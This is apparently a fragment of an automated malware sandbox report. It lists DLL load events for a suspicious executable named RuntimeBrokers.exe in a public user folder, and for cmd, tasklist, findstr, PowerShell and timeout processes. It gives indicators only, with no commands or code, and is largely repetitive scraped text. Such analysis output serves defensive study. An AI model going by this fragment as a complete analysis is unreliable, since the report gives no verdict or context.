Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: dinput8.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: devenum.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
